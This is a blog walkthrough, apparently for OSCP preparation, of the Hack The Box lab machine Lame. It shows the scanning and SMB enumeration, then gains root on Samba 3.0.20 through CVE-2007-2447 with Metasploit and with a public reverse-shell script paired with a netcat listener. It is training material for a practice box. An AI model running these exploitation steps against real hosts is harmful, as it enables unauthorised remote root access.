Path to OSCP: Lame

As part of my progress towards achieving Offensive Security Certified Professional certification, I’m attempting to complete all NetSecFocus OSCP-style boxes on Hack The Box, and detailing each box in this “Path to OSCP” blog series.

As far as I can tell, Lame is the first machine ever to be released on HTB. It’s a very simple box, which I completed over 2 years ago when first joining HTB, but for the sake of completion I’ll be going through previously rooted boxes again for OSCP.

I start as always by updating /etc/hosts with the IP of the box and hostname.htb. It’s more convenient than recalling the IP, and there are a few future boxes where web requests require the FQDN to resolve correctly, so it’s something I got into the habit of doing as a very first step.

We start enumeration with a standard all-port nmap network scan, revealing a few listening services:

dr@nostromo:~$ sudo nmap -p- -A lame.htb           Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-11 12:53 BST  Nmap scan report for lame.htb (10.10.10.3)  Host is up (0.033s latency).  Not shown: 65530 filtered tcp ports (no-response)  PORT     STATE SERVICE     VERSION  21/tcp   open  ftp         vsftpd 2.3.4  |_ftp-anon: Anonymous FTP login allowed (FTP code 230)  | ftp-syst:   |   STAT:   | FTP server status:  |      Connected to 10.10.14.5  |      Logged in as ftp  |      TYPE: ASCII  |      No session bandwidth limit  |      Session timeout in seconds is 300  |      Control connection is plain text  |      Data connections will be plain text  |      vsFTPd 2.3.4 - secure, fast, stable  |_End of status  22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)  | ssh-hostkey:   |   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)  |_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)  139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)  445/tcp  open  netbios-p   Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)  3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))  Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port  Aggressive OS guesses: Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (90%), Control4 HC-300 home controller (90 %), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (90%), Dell Integrated Remote Access Controller (iDRAC5) (90%), Dell Integrated Remote Access Controller (iDRAC6) (90%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f W AP, or Xerox WorkCentre Pro 265 printer (90%), Linux 2.4.21 - 2.4.31 (likely embedded) (90%), Linux 2.4.7 (90%), Cit rix XenServer 5.5 (Linux 2.6.18) (90%)  No exact OS matches for host (test conditions non-ideal).  Network Distance: 2 hops  Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results:  | smb-security-mode:   |   account_used: guest  |   authentication_level: user  |   challenge_response: supported  |_  message_signing: disabled (dangerous, but default)  | smb-os-discovery:   |   OS: Unix (Samba 3.0.20-Debian)  |   Computer name: lame  |   NetBIOS computer name:   |   Domain name: hackthebox.gr  |   FQDN: lame.hackthebox.gr  |_  System time: 2023-08-11T07:56:05-04:00  |_clock-skew: mean: 2h00m24s, deviation: 2h49m45s, median: 22s  |_smb2-time: Protocol negotiation failed (SMB2) TRACEROUTE (using port 445/tcp)  HOP RTT      ADDRESS  1   37.16 ms 10.10.14.1  2   37.17 ms lame.htb (10.10.10.3) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .  Nmap done: 1 IP address (1 host up) scanned in 181.80 seconds

I can’t resist a quick look into the SMB file share first, a comment of “oh noes!” on the tmp share with anonymous access permitted seemed promising at first, but ended up being a red herring, with nothing of note to be found.

dr@nostromo:~$ smbclient -L lame.htb  Password for [WORKGROUP\dr]:  Anonymous login successful        Sharename       Type      Comment         ---------       ----      -------         print$          Disk      Printer Drivers         tmp             Disk      oh noes!         opt             Disk               IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))         ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))  Reconnecting with SMB1 for workgroup listing.  Anonymous login successful        Server               Comment         ---------            -------        Workgroup            Master         ---------            -------         WORKGROUP            LAME dr@nostromo:~$ smbclient \\\\lame.htb\\tmp  Password for [WORKGROUP\dr]:  Anonymous login successful  Try "help" to get a list of possible commands.  smb: \> ls   .                                   D        0  Fri Aug 11 13:49:53 2023   ..                                 DR        0  Sat Oct 31 06:33:58 2020   .ICE-unix                          DH        0  Fri Aug 11 11:53:10 2023   vmware-root                        DR        0  Fri Aug 11 11:53:33 2023   .X11-unix                          DH        0  Fri Aug 11 11:53:36 2023   .X0-lock                           HR       11  Fri Aug 11 11:53:36 2023   5562.jsvc_up                        R        0  Fri Aug 11 11:54:12 2023   vgauthsvclog.txt.0                  R     1600  Fri Aug 11 11:53:08 2023                7282168 blocks of size 1024. 5386512 blocks available

Likewise for FTP, nothing to help us.

Doing a little research on service versions the nmap scan revealed, I find that Samba v3.0.20 has a “Username map script” exploit, with a module available in Metasploit.

I fire up Metasploit, load module multi/samba/usermap_script, and sure enough we’re straight in with root access. Easy!

sf6 exploit(multi/samba/usermap_script) > run [*] Started reverse TCP handler on 10.10.14.5:4444   [*] Command shell session 1 opened (10.10.14.5:4444 -> 10.10.10.3:39783) at 2023-08-11 13:22:00 +0100 id uid=0(root) gid=0(root)

However…that’s not really in the spirit of OSCP, where Metasploit can only be used a single time. So, let’s see what else is out there to exploit this vulnerability.

The exploit is recorded as CVE-2007-2447 (CVE – CVE-2007-2447 (mitre.org)), described as “The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the “username map script” smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share management.”

A quick search for the CVE number brings me to amriunix/CVE-2007-2447: CVE-2007-2447 – Samba usermap script (github.com), which contains a script to execute a reverse shell by uploading the required payload string. After following the installation instructions, we open a netcat listener and run the script against the target. Once again we’re in as root, this time a bit more OSCP-appropriate!

dr@nostromo:/opt/CVE-2007-2447$ python usermap_script.py lame.htb 445 10.10.14.5 7777                     [*] CVE-2007-2447 - Samba usermap script  [+] Connecting !  [+] Payload was sent - check netcat ! dr@nostromo:~$ nc -lvnp 7777              listening on [any] 7777 ...  connect to [10.10.14.5] from (UNKNOWN) [10.10.10.3] 52638  id  uid=0(root) gid=0(root)